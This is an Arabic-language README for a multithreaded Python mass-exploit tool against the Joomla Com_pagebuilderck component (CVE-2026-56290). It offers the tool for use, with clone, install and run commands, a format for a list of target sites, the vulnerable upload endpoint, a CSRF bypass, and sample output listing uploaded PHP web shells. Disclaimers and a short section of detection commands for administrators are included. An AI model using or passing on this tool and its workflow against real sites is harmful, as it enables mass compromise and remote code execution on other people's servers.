
CVE-2026-56290 - استغلال جماعي لمكوّن Com_pagebuilderck في Joomla (رفع ملفات غير مُقيَّد ← تنفيذ كود عن بُعد). متعدد الخيوط، تجاوز تلقائي لـ CSRF، رافع شِل PHP.
هذه الأداة مخصصة للأغراض التعليمية واختبار الأمان المصرح به فقط.
- الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني
- استخدم هذه الأداة فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها
- المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة
- باستخدامك لهذه الأداة، فإنك توافق على الامتثال لجميع القوانين واللوائح المعمول بها
لمزيد من إخلاء المسؤولية، يمكنك الاطلاع على إخلاء المسؤولية على غلاف Jenderal92. يمكنك التحقق منه هنا !!!
CVE-2026-56290 هي أداة استغلال جماعي تستهدف مكوّن Com_pagebuilderck في Joomla. تسمح هذه الثغرة الأمنية للمهاجمين عن بُعد برفع ملفات PHP عشوائية عبر آلية رفع ملفات غير مقيدة، مما يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد (RCE).
| الحقل | القيمة |
|---|---|
| معرف CVE | CVE-2026-56290 |
| المكوّن | Com_pagebuilderck |
| المنصة | Joomla! CMS |
| النوع | رفع ملفات غير مقيد (RCE) |
| درجة CVSS | 9.8 (حرجة) |
/media/com_pagebuilderck/gfonts/reslt.txtPython 2.7
pip (Python package installer)
تبعيات بايثون
pip install requests colorama
🔧 التثبيت
git clone https://github.com/Jenderal92/CVE-2026-56290.git
cd CVE-2026-56290
pip install -r requirements.txt
📖 الاستخدام
الاستخدام الأساسي
python CVE-2026-56290.py targets.txt
تنسيق ملف الإدخال
أنشئ ملف targets.txt مع عنوان URL واحد في كل سطر:
https://example1.com
http://example2.com/joomla
https://example3.com:8080
# Comments are ignored
المخرجات
· مخرجات الطرفية: تقدم ونتائج في الوقت الفعلي · reslt.txt: يحتوي على جميع عناوين URL الخاصة بشيلات المواقع الضعيفة
مثال للتشغيل
$ python CVE-2026-56290.py targets.txt
[+] CVE-2026-56290 - Com_pagebuilderck Mass Exploit
[+] Threads: 15
[+] Timeout: 10s
[+] Output file: reslt.txt
[+] Loaded 100 targets from file
[*] Starting pool with 15 processes...
[1] Queueing: https://example1.com
[2] Queueing: https://example2.com
...
[1] ✓✓✓ VULNERABLE: https://example1.com/media/com_pagebuilderck/gfonts/shell_abc123.php
⚙️ الإعدادات
يمكنك تعديل هذه المتغيرات في السكربت:
THREADS = 15 # Number of concurrent workers
TIMEOUT = 10 # Request timeout in seconds
USER_AGENT = "..." # Custom User-Agent string
OUTPUT_FILE = "reslt.txt" # Output filename
🛡️ اعتبارات أمنية
لمسؤولي الأنظمة
إذا كنت تدير موقع Joomla يستخدم Com_pagebuilderck:
مؤشرات الاختراق (IoC)
ابحث عن هذه العلامات الدالة على الاستغلال:
# Suspicious files in
/media/com_pagebuilderck/gfonts/*.php
/media/com_pagebuilderck/gfonts/*.phtml
/media/com_pagebuilderck/gfonts/*.phar
# Suspicious requests
/index.php?option=com_pagebuilderck&task=browse.ajaxAddPicture&[token]=1
أوامر الكشف
# Find suspicious PHP files in the media directory
find /path/to/joomla/media/com_pagebuilderck/gfonts/ -name "*.php" -type f
# Check for recent modifications
find /path/to/joomla/media/com_pagebuilderck/gfonts/ -type f -mtime -7
# Look for suspicious file names (random strings)
ls -la /path/to/joomla/media/com_pagebuilderck/gfonts/ | grep -E '[a-z0-9]{8,}\.(php|phtml|phar)'
⚠️ إشعار قانوني
يتم توفير هذا البرنامج "كما هو" (AS IS)، دون أي ضمان من أي نوع. المؤلف غير مسؤول عن أي استخدام غير قانوني أو غير أخلاقي لهذه الأداة. احصل دائمًا على إذن مناسب قبل اختبار أي نظام.
🙏 شكر وتقدير
· الباحثون الأمنيون الذين اكتشفوا وأبلغوا عن CVE-2026-56290 · مجتمع Joomla للحفاظ على نظام إدارة المحتوى
تذكر: مع القوة العظيمة تأتي مسؤولية عظيمة. استخدم هذه الأداة بشكل أخلاقي وقانوني.